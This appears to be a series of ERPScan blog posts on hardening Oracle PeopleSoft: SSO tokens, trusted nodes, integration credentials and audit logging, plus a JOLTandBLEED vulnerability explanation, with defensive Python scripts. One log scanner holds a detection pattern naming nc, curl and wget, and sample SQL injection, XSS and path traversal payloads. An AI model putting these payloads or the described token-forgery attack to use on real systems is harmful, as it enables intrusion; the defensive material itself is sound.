Channel: Oracle PeopleSoft Security – ERPScan

EAS-SEC. Oracle PeopleSoft security configuration. Part 9: Insecure trusted connections


Various mechanisms can be used to build business processes that span several systems. Trusted relationships, or single sign-on (SSO), between PeopleSoft systems minimize the authentication requirements: if the called PeopleSoft system accepts the calling system (node) as trusted, no password is required.

The main benefits of this interaction are that passwords are not sent over the network and that a user who has signed in once can work beyond the boundaries of a single system. With this function in place, you can build a PeopleSoft portal made up of several PeopleSoft applications (e.g. Campus Solutions, HCM, FSCM) in which a user, once authenticated, navigates across all of them.

PeopleSoft-only Single Sign-on [EASSEC-PVAG-PS-28]

Description

Single sign-on is critical for PeopleSoft portal implementations because the portal integrates content from various data sources and application servers and presents it in a unified interface.

After the first application server/node authenticates a user, the system delivers a web browser cookie containing an authentication token (PS_TOKEN). PeopleSoft uses browser cookies to store a unique access token for each user after the initial authentication. When the user connects to another PeopleSoft application server/node, the second server uses the token from the browser cookie (as long as it is still valid) to re-authenticate the user automatically, so users do not have to sign in repeatedly.

The list of nodes that a system trusts resides in its PSTRUSTNODES table. You maintain the list under PeopleTools > Security > Security Objects > Single Signon: the trusted nodes are selected there, and the participating sites must additionally be allowed by the web profile (the whitelist of sites, or the Domain Compare option) before they can take part in single sign-on.

Furthermore, a node definition offers two authentication options for single sign-on:

  • Password (the value you enter is limited to 88 characters): each node in the single sign-on configuration authenticates other nodes by "knowing" their passwords.
  • Certificate: a digital certificate authenticates each node in the single sign-on configuration.

Threat

  1. PeopleSoft single sign-on also works across web servers. For example, imagine two web servers, X and Y, where X is an SSL/TLS site and Y is not. Many organizations want server Y to trust the authentication token PS_TOKEN issued by server X. For this to be safe, PS_TOKEN must carry the Secure cookie attribute.
    If PS_TOKEN is not marked Secure, the browser sends it to server Y over the unencrypted, non-SSL/TLS link when the user opens server Y; that is normal browser behaviour for non-secure cookies. An attacker who can sniff the network captures the token and uses it to sign on to the SSL/TLS-protected server X.
  2. If a password is used as the node authentication option for single sign-on, especially a short one, an attacker who obtains a PS_TOKEN can perform the TokenChpoken attack: the token's signature is computed from the node password, so the password can be brute-forced offline and tokens can then be forged for any user, giving full access to PeopleSoft.

Solution

To resolve the first issue, select the Secure Cookie with SSL check box on the Web Profile Configuration – Security page. This property controls the secure attribute of the single sign-on cookie: if it is enabled and the scheme of the current request is HTTPS (an SSL/TLS server), the system sets the secure attribute of PS_TOKEN to true.

This prevents the single sign-on token from travelling over an insecure network. Note that enabling the property effectively disables single sign-on to any non-SSL/TLS servers, so move those servers to SSL/TLS rather than leaving the cookie unprotected. To prevent the TokenChpoken attack, use digital certificate authentication when implementing single sign-on, and if a password must remain in use make it long and random; the authentication option is set on the Node Definitions page (PeopleTools > Portal > Node Definitions).
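The first threat above is a cookie-attribute problem that can be checked from the outside. The following Python script is an added example, not ERPScan's or Oracle's code: it parses the Set-Cookie headers a PeopleSoft site returns at sign-on and decides whether a browser would replay PS_TOKEN to a plain-HTTP node, applying the same-scheme rule browsers use for Secure cookies. The cookie values, the node URLs and the hcm/fscm host names are constructed for the example.

```python
"""Audit Set-Cookie headers for the PS_TOKEN single sign-on cookie.

Added example (not ERPScan's or Oracle's code). It parses the Set-Cookie
headers a PeopleSoft web server returns after sign-on and reports whether
the browser would replay PS_TOKEN over a plain-HTTP node, which is the
condition the Threat section describes. All sample data is constructed.
"""
from __future__ import annotations
from urllib.parse import urlsplit


def parse_set_cookie(header: str) -> dict:
    """Parse one Set-Cookie header value into name, value and attributes.

    Attribute names are lower-cased; flag attributes (Secure, HttpOnly)
    map to True, valued attributes (Path, Domain, ...) to their string.
    """
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    cookie = {"name": name.strip(), "value": value.strip(), "attrs": {}}
    for attr in parts[1:]:
        if not attr:
            continue
        key, _, val = attr.partition("=")
        cookie["attrs"][key.strip().lower()] = val.strip() if val else True
    return cookie


def browser_would_send(cookie: dict, url: str) -> bool:
    """Model the RFC 6265 rule a browser applies before attaching a cookie.

    A cookie carrying the Secure attribute is only sent over https. Domain
    and Path matching are checked too, so the result says whether the token
    would reach the given node URL. A cookie without a Domain attribute is
    treated as set by the same host (host-only cookie).
    """
    parts = urlsplit(url)
    attrs = cookie["attrs"]
    if attrs.get("secure") and parts.scheme != "https":
        return False
    domain = attrs.get("domain")
    if isinstance(domain, str) and domain:
        d = domain.lstrip(".").lower()
        host = (parts.hostname or "").lower()
        if not (host == d or host.endswith("." + d)):
            return False
    path = attrs.get("path") if isinstance(attrs.get("path"), str) else "/"
    return (parts.path or "/").startswith(path)


def audit_sso_cookies(headers: list[str], nodes: list[str]) -> list[str]:
    """Return findings for PS_TOKEN cookies that could leak to a non-TLS node."""
    findings = []
    for h in headers:
        c = parse_set_cookie(h)
        if c["name"] != "PS_TOKEN":
            continue
        if not c["attrs"].get("secure"):
            findings.append("PS_TOKEN set without Secure attribute")
        if not c["attrs"].get("httponly"):
            findings.append("PS_TOKEN set without HttpOnly attribute")
        for node in nodes:
            if node.startswith("http://") and browser_would_send(c, node):
                findings.append(f"PS_TOKEN would be sent in clear to {node}")
    return findings


# Constructed sample: the weak setting beside the corrected one (token value is a placeholder).
WEAK_HEADERS = [
    "PS_TOKEN=AAAAqQECAwQAAQAAAAACvAAAAAAAAAAsAARTaGRyAk4AcQgAOAAuADEAMAAU; Path=/; Domain=.example.com",
]
HARDENED_HEADERS = [
    "PS_TOKEN=AAAAqQECAwQAAQAAAAACvAAAAAAAAAAsAARTaGRyAk4AcQgAOAAuADEAMAAU; Path=/; Domain=.example.com; Secure; HttpOnly",
]
# Hypothetical nodes: server X (TLS) and server Y (plain HTTP) from the Threat section.
NODES = ["https://hcm.example.com/psp/ps/", "http://fscm.example.com/psp/ps/"]

if __name__ == "__main__":
    print("weak:", audit_sso_cookies(WEAK_HEADERS, NODES))
    print("hardened:", audit_sso_cookies(HARDENED_HEADERS, NODES))
```

Run it against the headers captured from your own sign-on page (any HTTP client that shows raw response headers will do); a finding of the third kind means the Secure Cookie with SSL setting is not doing its job for that node.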

PeopleSoft integration with third-party systems via Integration Broker [EASSEC-PVAG-PS-29]

Description

PeopleSoft Integration Broker is a middleware technology that

  • performs asynchronous and synchronous messaging among internal systems and third-party systems;
  • exposes PeopleSoft business logic like web services to PeopleSoft and third-party systems;
  • consumes and invokes web services from third-party and PeopleSoft systems.

PeopleSoft Integration Broker enables you to perform these integrations among internal systems and third-party integration partners, while managing data structure, data format and transport disparities.

Third-party systems are configured in the same way as PeopleSoft systems: on the Node Definitions page (PeopleTools > Portal > Node Definitions) and on the Gateways page (IB_GATEWAY), where you update the gateway configuration settings and register the target connectors to be used with the gateway.

PeopleSoft delivers the following target connectors, each with its own set of properties:

  • APNTargetConnector
  • AS2TargetConnector
  • ExampleTargetConnector
  • SimpleFileTargetConnector
  • FTPTargetConnector
  • GetFileTargetConnector
  • GetMailTargetConnector
  • HttpTargetConnector
  • JMSTargetConnector
  • ApplicationMessagingTargetConnector
  • PeopleSoftTargetConnector
  • RIDCTargetConnector
  • SFTPTargetConnector
  • SMTPTargetConnector

Threat

The web services and integrations in your PeopleSoft applications can expose sensitive information, including financial data. Security requirements differ per integration: interfacing with a credit card processing vendor, publishing salary information out of human resources and synchronizing business units between applications do not carry the same risk. If the credentials stored for an integration, or those of a user with access to a third-party system, are compromised, an attacker gains access to the PeopleSoft system and can perform critical actions on sensitive data through Service Operations.

Solution

A security analyst must evaluate the security requirements of each individual integration. Review the list of connections with third-party systems and of active nodes, and decide which of them are actually needed; deactivate the rest. If a connection stores credentials (a user ID and password in the connector properties), review which account they belong to and restrict its permissions to what the integration requires. Connector properties are configured on the Gateways page (IB_GATEWAY). Node definitions, WS-Security settings and routing definitions with their service operations are configured on the Node Definitions page (PeopleTools > Portal > Node Definitions).

Remote PeopleSoft database connections [EASSEC-PVAG-PS-30]

Description

Data sources represent the location of the source data that is extracted, transformed, and loaded to the target. Remote data source data is extracted from a separate (remote) database and migrated into the local database. You must define remote database connections to source data from a database other than your local PeopleSoft database instance.

The Remote Database Access Management page enables you to define connectivity information for relational databases to be used for sourcing data for PeopleSoft Data Transformer. The Remote Database Access Management page (REMOTEDB) is used to define remote database connections.

Threat

If the credentials of a user with access to the system are compromised, the attacker also gains access to the remote database, because the local database stores everything needed to reach it: the database name, server, port, user ID and password.

Solution

If you do not need to extract data from a separate database and migrate it into the local one, do not use this functionality at all. If you only access data in the local database, there is no need to set up remote database connections; remove any that exist.

Further steps

Beyond the mechanisms of the application server itself, servers are often linked by a number of other mechanisms. For example, Oracle Access Manager can serve as the single sign-on solution when an organization runs both other Oracle applications and PeopleSoft: users authenticated by the Oracle system can reach PeopleSoft applications without re-authenticating.

The scope of such mechanisms also includes every other way of moving into a neighbouring system that a penetration test would try: attempting to enter the neighbouring system with the same or similar passwords at the OS, RDBMS and application levels, and all kinds of searches for plaintext passwords in the file system (update, integration and backup scripts, and so on). All of this should be checked so that one weak link cannot give an attacker access to every system.

Stay tuned, as soon we will come back with the final critical area – Security events logging.

The post EAS-SEC. Oracle PeopleSoft security configuration. Part 9: Insecure trusted connections appeared first on ERPScan.


EAS-SEC. Oracle PeopleSoft Security Configuration. Part 10: Logging of Security Events


One of the most important aspects of PeopleSoft security is having security event logging in place. In case of an incident (which is likely, since there are plenty of settings and it is difficult to control all of them), only a correctly configured security audit lets a company discover the attack in time and, perhaps, respond to it. Such an audit also helps stop cyberattacks at their early stage, when the attacker is still collecting information about the system: if events are collected promptly and analyzed with signature-based techniques or machine learning for anomaly detection, attacks can be both detected and prevented quickly.

The security event logging landscape is complicated: each PeopleSoft component has its own logs, many of which hold sensitive information, so control over each component becomes vital. That control is not always centralized. For example, the password policies of WebLogic and PeopleSoft are configured separately, and so is their security event logging. This section covers the four most critical logs.

Logging of table changes [EASSEC-PVAG-PS-31]

Description

The PeopleSoft system offers three methods of data auditing:

  1. Field Level Auditing is used when only a few fields of a record need to be audited. All field audits are stored in a single record, PSAUDIT.
  2. Record Level Auditing gives you a separate audit table dedicated to one database record. It makes it easy to find the set of fields modified in a row of a particular record, and it is also very useful when key fields themselves may change on correction (e.g. EFFDT in JOB).
    The audit record must contain the following fields:
    • AUDIT_OPRID
    • AUDIT_STAMP
    • AUDIT_ACTN
  3. Database Level Auditing, i.e. trigger-based auditing, is provided by PeopleTools Utilities as an alternative to the record-based auditing of Application Designer. It is much stronger than record or field level auditing: it captures changes made to the audited table whether they come through the online pages or by any other means. Record and field level auditing would not catch a change made with a SQL tool, COBOL, SQR and the like.

For options 1 and 2, the audit captures changes made through the online pages only; if the data is changed by a program issuing a SQL statement, nothing is captured. Option 3 covers both online and direct database changes to the transaction record.

Threat

Without direct table change logging there is a risk of a late response, or none at all, to unauthorized modification of table data. For example, a malicious insider may change a bank account number and commit fraud by redirecting a payment to another account, or alter financial aid amounts and student grades.

Solution

Best practice is to implement table change logging, in particular record level and database level audits.

Field Level Audit

Open the record definition and then Record Field Properties for each field whose changes need to be captured. In the Audit section, select the types of action to be audited.

For each audited field that changes, a row is inserted into the audit record (PSAUDIT) holding the old and new value.

[Screenshot: Field Level Audit]

Record Level Audit

Open the record definition and then Record Properties. On the Use tab you enter the Audit Record Name and the types of action (Add, Delete, Change, Selective) to be captured.

For any change to the fields of the record, a row is inserted into the audit record.

[Screenshot: Record Level Audit]

Database Level Audit

PeopleTools > Utilities > Audit provides pages that generate the trigger script, which is then executed in the database. This kind of audit captures changes made to the record at the database level, whatever tool made them.

The audit record name should start with AUDIT_, and the record should contain these fields as its key fields:

  • AUDIT_OPRID — captures who changed the data;
  • AUDIT_STAMP — captures the timestamp;
  • AUDIT_ACTN — captures the type of transaction (insert/delete/update).
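The following Python script is an added example, not PeopleSoft's generated trigger script: it builds a cut-down JOB table and an AUDIT_ record with the three key fields above in SQLite, attaches insert/update/delete triggers, and then shows that a salary change made with plain SQL (the case record and field level auditing miss) still lands in the audit trail. The table columns, the operator IDs and the way the operator reaches the trigger (a one-row PS_SESSION_OPRID table) are simplifications made for this example.

```python
"""Trigger-based (database level) audit of a transaction record.

Added example, not PeopleSoft's generated trigger script. SQLite is used so
it runs stand-alone, but the shape is the one the text describes: an AUDIT_
record keyed by AUDIT_OPRID, AUDIT_STAMP and AUDIT_ACTN, filled by triggers,
so a change made with raw SQL outside any online page is still captured.
PS_JOB is cut down to a few columns, and the one-row PS_SESSION_OPRID table
through which the operator ID reaches the trigger is an assumption of this
example, not PeopleSoft's mechanism.
"""
from __future__ import annotations
import sqlite3

SCHEMA = """
CREATE TABLE PS_JOB (
    EMPLID    TEXT NOT NULL,
    EFFDT     TEXT NOT NULL,
    ANNUAL_RT REAL NOT NULL,
    PRIMARY KEY (EMPLID, EFFDT)
);
-- Audit record: the three key fields first, then a copy of the audited columns.
CREATE TABLE AUDIT_JOB (
    AUDIT_OPRID TEXT NOT NULL,
    AUDIT_STAMP TEXT NOT NULL,
    AUDIT_ACTN  TEXT NOT NULL,   -- A = add, C = change, D = delete
    EMPLID      TEXT,
    EFFDT       TEXT,
    ANNUAL_RT   REAL
);
-- Stand-in for the session context a real trigger reads (assumption of this example).
CREATE TABLE PS_SESSION_OPRID (OPRID TEXT NOT NULL);
INSERT INTO PS_SESSION_OPRID VALUES ('UNKNOWN');

CREATE TRIGGER AUDIT_JOB_INS AFTER INSERT ON PS_JOB BEGIN
    INSERT INTO AUDIT_JOB VALUES (
        (SELECT OPRID FROM PS_SESSION_OPRID), datetime('now'), 'A',
        NEW.EMPLID, NEW.EFFDT, NEW.ANNUAL_RT);
END;
CREATE TRIGGER AUDIT_JOB_UPD AFTER UPDATE ON PS_JOB BEGIN
    INSERT INTO AUDIT_JOB VALUES (
        (SELECT OPRID FROM PS_SESSION_OPRID), datetime('now'), 'C',
        NEW.EMPLID, NEW.EFFDT, NEW.ANNUAL_RT);
END;
CREATE TRIGGER AUDIT_JOB_DEL AFTER DELETE ON PS_JOB BEGIN
    INSERT INTO AUDIT_JOB VALUES (
        (SELECT OPRID FROM PS_SESSION_OPRID), datetime('now'), 'D',
        OLD.EMPLID, OLD.EFFDT, OLD.ANNUAL_RT);
END;
"""


def open_audited_db() -> sqlite3.Connection:
    """Create an in-memory database with the audited table and its triggers."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def run_as(conn: sqlite3.Connection, oprid: str, sql: str, params=()) -> None:
    """Execute a raw SQL statement on behalf of an operator.

    This stands for a change made through a SQL tool, SQR or COBOL rather
    than an online page: field and record level audit would miss it, the
    trigger does not.
    """
    conn.execute("UPDATE PS_SESSION_OPRID SET OPRID = ?", (oprid,))
    conn.execute(sql, params)
    conn.commit()


def audit_trail(conn: sqlite3.Connection) -> list[tuple]:
    """Return (oprid, action, emplid, annual_rt) rows in the order they were written."""
    rows = conn.execute(
        "SELECT AUDIT_OPRID, AUDIT_ACTN, EMPLID, ANNUAL_RT FROM AUDIT_JOB ORDER BY rowid")
    return [tuple(r) for r in rows]


def salary_changes_by_unexpected_operators(conn, allowed_oprids) -> list[tuple]:
    """Detection query: salary changes made by anyone outside the allowed HR group."""
    marks = ",".join("?" * len(allowed_oprids))
    sql = ("SELECT AUDIT_OPRID, EMPLID, ANNUAL_RT FROM AUDIT_JOB "
           f"WHERE AUDIT_ACTN = 'C' AND AUDIT_OPRID NOT IN ({marks})")
    return [tuple(r) for r in conn.execute(sql, tuple(allowed_oprids))]


def demo() -> sqlite3.Connection:
    """Constructed scenario: HR loads a row, a DBA account bumps the salary by SQL."""
    conn = open_audited_db()
    run_as(conn, "HRADMIN", "INSERT INTO PS_JOB VALUES (?, ?, ?)", ("KU0001", "2018-01-01", 60000.0))
    run_as(conn, "SYSADM", "UPDATE PS_JOB SET ANNUAL_RT = ? WHERE EMPLID = ?", (250000.0, "KU0001"))
    run_as(conn, "HRADMIN", "DELETE FROM PS_JOB WHERE EMPLID = ?", ("KU0001",))
    return conn


if __name__ == "__main__":
    c = demo()
    for row in audit_trail(c):
        print(row)
    print("suspicious:", salary_changes_by_unexpected_operators(c, ["HRADMIN"]))
```

The detection query is the part worth keeping: once the audit tables exist, a scheduled check for changes by accounts outside the expected group (or outside business hours) is how the fraud case in the Threat section gets caught.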

Logging of PeopleSoft Integration Gateway activities [EASSEC-PVAG-PS-32]

Description

You can generate and view integration gateway logging data on an on-demand basis for outbound requests in the Service Operations Monitor.

When on-demand logging is enabled in the Service Operations Monitor, the integration gateway creates a log file per outbound request, named after the transaction ID with an .html extension. Depending on the log level set, the standard integration gateway message log also includes the transactional message logging data. The logged data also contains the URL of the gateway performing the logging, including the transaction ID and the IP address; if you have implemented inbound load balancing using virtual application server domains, this tells you which gateway is doing the logging.

Scroll through the integrationGateway.properties file until you find the logging section. The following line sets the logging level (2 is the default):
ig.log.level=2

The logging levels are:

  Level   Meaning
  -100    Suppress any logging
  -1      Language exception
  1       Standard gateway exception
  2       Errors and warnings
  3       Important information, errors and warnings
  4       Standard and important information, errors and warnings
  5       Low importance, standard and important information, errors and warnings

Threat

With no security event logging there is a risk of a late response, or none at all, to attacks on the gateway. The risk of a breach is considerably increased by vulnerabilities in the service (e.g. CVE-2013-3821 and CVE-2017-3548) for which exploits are available on the Internet; they allow unauthorized access to the service and execution of arbitrary OS commands.

Solution

To change the Integration Gateway logging level, go to the [PIA_HOME]\webserv\[DOMAIN]\applications\peoplesoft\PSIGW.war\WEB-INF directory and edit the logging section of integrationGateway.properties. Assign a level appropriate to your company's security policy; level 3 is recommended. Bear in mind that gateway logs can contain message payloads, so restrict access to the log directory as you would to the data itself.

Logging of HTTP access [EASSEC-PVAG-PS-33]

Description

In addition to the logging and tracing options that PeopleTools provides, the web server (WebSphere or WebLogic) offers a variety of tracing options. HTTP access logging, however, is configured in the particular web server in use.

Threat

If HTTP access logging is not maintained, there is a risk of a delayed response, or none at all, to attacks carried out over HTTP. Most of the initial attacks used to compromise the system, such as SQL injection, XSS and OS command injection, arrive over HTTP. With these logs disabled, a forensic investigation of an Internet-facing incident is almost impossible.

Solution

Enable HTTP access logging in the web server, and forward the logs to central storage so that an attacker who compromises the server cannot simply delete them.

WebLogic

To enable the HTTP access log:

  1. Make sure the PIA server is running (WebLogic Server is started).
  2. Log on to the Administration Console.
  3. Open the server's Logging configuration page:
    • In the Domain Structure tree, expand Environment and click Servers.
    • Click PIA (or your custom server name) in the Servers list.
    • Select the Logging tab, then the HTTP tab.
  4. Enable HTTP access logging:
    • Click the Lock & Edit button.
    • Select the HTTP access log file enabled check box to turn on access.log.
    • Modify the Log file name field if desired.
    • Click Save, then Activate Changes.
  5. Restart the WebLogic Server.

WebSphere

To enable HTTP access and error logging:

  1. In the Administrative Console, select Servers > Server Types > WebSphere application servers > server1, and click the NCSA access and HTTP error logging link.
  2. Enable HTTP access logging by selecting Enable logging service at server start-up and Enable access logging. The HTTP access log is written to PIA_HOME/webserv/profileName/logs/server1/http_access.log.
  3. Enable HTTP error logging by selecting Enable error logging. The HTTP error log is written to PIA_HOME/webserv/profileName/logs/server1/http_error.log.
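Once the access log exists, the Threat section's attack classes can be hunted in it. The Python script below is an added example, not ERPScan's or Oracle's code: it parses NCSA common-format lines (the format of WebLogic's access.log and WebSphere's http_access.log), decodes the request target twice to defeat double encoding, and matches it against a few injection signatures. The log lines, IP addresses and IScript names are constructed for the example; the signature set is deliberately small and is a starting point, not a complete WAF rule set.

```python
"""Scan web server HTTP access logs for injection attempts against PIA.

Added example (not ERPScan's or Oracle's code). It parses lines in the NCSA
common log format that WebLogic's access.log and WebSphere's
http_access.log use, URL-decodes the request target and matches it against
a few injection signatures. The log lines are constructed for the example;
the paths are PeopleSoft's usual /psp/ and /psc/ servlets.
"""
from __future__ import annotations
import re
from urllib.parse import unquote_plus

# host ident authuser [date] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>[^"]+))?" (?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures, applied to the fully decoded request target.
SIGNATURES = {
    "sqli": re.compile(r"(?i)('|\")\s*(or|and)\s+\S+\s*=|union\s+select|sleep\s*\(|waitfor\s+delay"),
    "xss": re.compile(r"(?i)<\s*script|javascript:|on(error|load|mouseover)\s*="),
    "cmdi": re.compile(r"(?:;|\||&&|`|\$\()\s*(cat|ls|id|whoami|nc|curl|wget|powershell)\b"),
    "trav": re.compile(r"(?:\.\./|\.\.\\){2,}"),
}


def parse_line(line: str) -> dict | None:
    """Return the fields of one access log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # Decode twice: attackers double-encode to slip past naive filters.
    rec["decoded"] = unquote_plus(unquote_plus(rec["target"]))
    return rec


def classify(rec: dict) -> list[str]:
    """Names of every signature the decoded request target matches."""
    return [name for name, rx in SIGNATURES.items() if rx.search(rec["decoded"])]


def scan(lines: list[str]) -> list[dict]:
    """Return one finding per line that matches at least one signature."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec)
        if hits:
            findings.append({"ip": rec["ip"], "status": rec["status"],
                             "kinds": hits, "target": rec["decoded"]})
    return findings


def top_sources(findings: list[dict]) -> list[tuple[str, int]]:
    """Source IPs ranked by number of flagged requests, for blocking or triage."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


# Constructed sample log (NCSA common log format).
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Jun/2017:11:34:07 +0000] "GET /psp/ps/EMPLOYEE/HRMS/c/ROLE_EMPLOYEE.HR_EE_ADDR.GBL HTTP/1.1" 200 8123',
    '203.0.113.7 - - [16/Jun/2017:11:34:09 +0000] "GET /psc/ps/EMPLOYEE/HRMS/s/WEBLIB_PT_NAV.ISCRIPT1.FieldFormula.IScript_PT_NAV_INFRAME?EMPLID=%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 412',
    '203.0.113.7 - - [16/Jun/2017:11:34:11 +0000] "GET /psp/ps/?cmd=login&languageCd=%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 5120',
    '198.51.100.9 - - [16/Jun/2017:11:35:02 +0000] "POST /PSIGW/PeopleSoftListeningConnector HTTP/1.1" 200 675',
    '203.0.113.7 - - [16/Jun/2017:11:35:30 +0000] "GET /psc/ps/EMPLOYEE/HRMS/s/WEBLIB_FILE.ISCRIPT1.FieldFormula.IScript_Get?f=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 0',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["status"], f["kinds"], f["target"])
    print("top sources:", top_sources(found))
```

Note that the third sample line returned 200: the status code alone does not tell you whether an injection attempt succeeded, which is why the decoded target, not just the error rate, has to be inspected.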

IDDA Logging [EASSEC-PVAG-PS-34]

Description

The PeopleSoft Instrumented Development Diagnostic Aid (IDDA) logger gathers specific information about various areas of the PeopleSoft Internet Architecture and PeopleSoft Interaction Hub, including:

  • PeopleSoft Internet Architecture processing;
  • Integration Broker;
  • Reporting, Report Repository;
  • Portal;
  • Caching;
  • File processing;
  • Security, authentication;
  • Performance Monitor;
  • WSRP;
  • Jolt.

The IDDA functional categories are:

  Bit Value   Functional Category
  1           PeopleSoft Internet Architecture
  2           Integration Broker
  4           Report repository
  8           Portal
  16          Web server caching
  32          File processing (attachments)
  64          Authentication
  128         Performance Monitor
  256         Web Services for Remote Portlets (WSRP)
  512         Jolt
Threat

If IDDA logging is not maintained, there is a risk of a delayed response, or none at all, to external attacks or internal fraud; in particular, the Authentication category (bit value 64) is the one that covers sign-on processing at the web tier. A forensic investigation after a compromise is then almost impossible.

Solution

To enable IDDA logging:

  1. Select PeopleTools > Web Profile > Web Profile Configuration and open the current web profile.
  2. Select the Custom Properties page.
  3. Add a new row and enter these values:
       Property Name    IDDA
       Validation Type  Number
       Property Value   The sum of the bit values of the functional areas you want to log. For example, to log PIA (1) and Portal (8), enter 9.
  4. Click Save.
  5. Restart the PeopleSoft site.
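Because the property value is a bit mask typed by hand, it is easy to enter a number that does not mean what was intended. The Python helpers below are an added example, not Oracle's code: they compute the value for a set of categories from the table above, decode an existing value back into category names, and reject values that set bits the table does not define. The "security baseline" selection is a choice made for this example, not a value given by Oracle.

```python
"""Encode and decode the IDDA web profile custom property value.

Added example (not Oracle's code). The IDDA value is the sum of the bit
values from the functional category table; these helpers build such a
value, decode one back, and flag undefined bits.
"""
from __future__ import annotations

IDDA_CATEGORIES = {
    1: "PeopleSoft Internet Architecture",
    2: "Integration Broker",
    4: "Report repository",
    8: "Portal",
    16: "Web server caching",
    32: "File processing (attachments)",
    64: "Authentication",
    128: "Performance Monitor",
    256: "Web Services for Remote Portlets (WSRP)",
    512: "Jolt",
}
ALL_BITS = sum(IDDA_CATEGORIES)  # 1023: every defined bit set


def idda_value(*names: str) -> int:
    """Property value for the named categories (case-insensitive; unknown names are an error)."""
    by_name = {v.lower(): k for k, v in IDDA_CATEGORIES.items()}
    value = 0
    for name in names:
        try:
            value |= by_name[name.lower()]
        except KeyError:
            raise ValueError(f"unknown IDDA category: {name!r}") from None
    return value


def idda_decode(value: int) -> list[str]:
    """Category names enabled by a property value, in bit order; undefined bits are an error."""
    if not isinstance(value, int) or value < 0:
        raise ValueError("IDDA value must be a non-negative integer")
    undefined = value & ~ALL_BITS
    if undefined:
        raise ValueError(f"value {value} sets undefined bits ({undefined})")
    return [name for bit, name in sorted(IDDA_CATEGORIES.items()) if value & bit]


def security_baseline() -> int:
    """Areas a security review most often needs: PIA, Integration Broker,
    Authentication and Jolt. This selection is an assumption of the example."""
    return idda_value("PeopleSoft Internet Architecture", "Integration Broker",
                      "Authentication", "Jolt")


if __name__ == "__main__":
    print("PIA + Portal =", idda_value("PeopleSoft Internet Architecture", "Portal"))
    print("baseline =", security_baseline(), idda_decode(security_baseline()))
```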

Further steps

After enabling the four basic logs described above, implement the fine-tuned settings: the detailed list of tables with change logging enabled, the details of security event logging in the security audit logs, the event types recorded in the PeopleSoft Integration Gateway log, and so on. Central collection and storage of the logs should be accompanied by analysis of critical events. Only then should you add and analyze the more detailed optional logs of each service, such as SYSAUDIT and the PeopleSoft Process Scheduler Server event log.

The post EAS-SEC. Oracle PeopleSoft Security Configuration. Part 10: Logging of Security Events appeared first on ERPScan.

JOLTandBLEED Details and PoC

On November 15, 2017, Oracle published urgent critical updates for the JOLTandBLEED vulnerability (CVE-2017-10269). Today we released its proof of concept. As you remember, this vulnerability allows an attacker to gain full access to all data stored in the following ERP systems:

  • Oracle PeopleSoft Campus Solutions
  • Oracle PeopleSoft Human Capital Management
  • Oracle PeopleSoft Financial Management
  • Oracle PeopleSoft Supply Chain Management, etc.

The root of the problem is how the Jolt server handler (JSH) manages a packet with opcode 0x32. By exploiting this flaw, an attacker can read the internal memory of the Tuxedo middleware.

The Jolt server handler has a function called jsh_msgrcv that processes incoming messages. In it, two code blocks generate the responses to a client's invalid request.

The code in those blocks (shown as a screenshot in the original post) does the following: from the error code, the "__gp_gets" function fetches its text description, and the "userlog" function writes this message to the server log (TUXLOG). Then the "htoji" function packs the size of the generated message in a special way. The programmer assumed the message sizes would be 0x40 (64) and 0x9c (156) bytes respectively. However, "htoji" packed the value in big-endian, not in little-endian as the developer expected. As a result, the parameters became 0x40000000 and 0x9c000000, that is 1073741824 and 2617245696 in decimal. These values are then used as the size of the data transmitted by the "send" function, which consequently lets us read the internal memory of the application over the network.

As you have probably noticed, there are two packets, with opcodes 0x32 and 0x64, and the issue occurs while processing both.
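The length mix-up is worth seeing in numbers. The Python snippet below is an added example, not ERPScan's PoC and not Tuxedo code: it only models the arithmetic described above, packing the intended length the way the post says htoji did (big-endian) and reading it back the way the sender consumed it (little-endian), which reproduces the two oversized lengths and shows how much memory beyond the reply buffer a send() of that size would expose. It sends nothing and touches no Tuxedo server.

```python
"""Reproduce the length-field mix-up at the root of JOLTandBLEED.

Added example, not ERPScan's PoC and not Tuxedo code: it models only the
arithmetic the post describes. The error path writes a 32-bit message
length with htoji, which (per the post) produced big-endian bytes, while
the sender consumed the field as a little-endian integer. The two lengths
named in the post (0x40 and 0x9c) become 0x40000000 and 0x9c000000, and
send() then tries to push that many bytes of process memory to the client.
"""
import struct


def htoji_as_described(n: int) -> bytes:
    """Pack a 32-bit length the way the post says htoji did: big-endian."""
    return struct.pack(">I", n)


def length_as_consumed(field: bytes) -> int:
    """Read the same four bytes the way the sender did: little-endian."""
    return struct.unpack("<I", field)[0]


def effective_send_length(intended: int) -> int:
    """Length actually handed to send() for an intended message length."""
    return length_as_consumed(htoji_as_described(intended))


def leaked_bytes(intended: int, buffer_len: int) -> int:
    """Bytes past the end of the reply buffer that a send() of that length exposes.

    The reply buffer is sized for the intended message; everything beyond
    it is whatever happens to follow in the server process memory.
    """
    return max(0, effective_send_length(intended) - buffer_len)


if __name__ == "__main__":
    for intended in (0x40, 0x9c):
        eff = effective_send_length(intended)
        print(f"intended {intended:#x} ({intended}) -> sent {eff:#x} ({eff}), "
              f"over-read {leaked_bytes(intended, intended)} bytes")
```

The same check applied to a correctly matched pair (pack and unpack both little-endian, or both big-endian) returns the intended length, which is the one-line fix the developer needed and the reason the patch is small.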

Please do not test this PoC on your production servers. Have a nice day.

The post JOLTandBLEED Details and PoC appeared first on ERPScan.

Analyzing Oracle Security – Oracle Critical Patch Update January 2018

Today Oracle has released its quarterly patch update for January 2018. It fixes a total of 237 vulnerabilities.

The main highlights are as follows:

  • The current CPU contains 153 vulnerabilities in business-critical applications, 64% of all the vulnerabilities fixed this quarter.
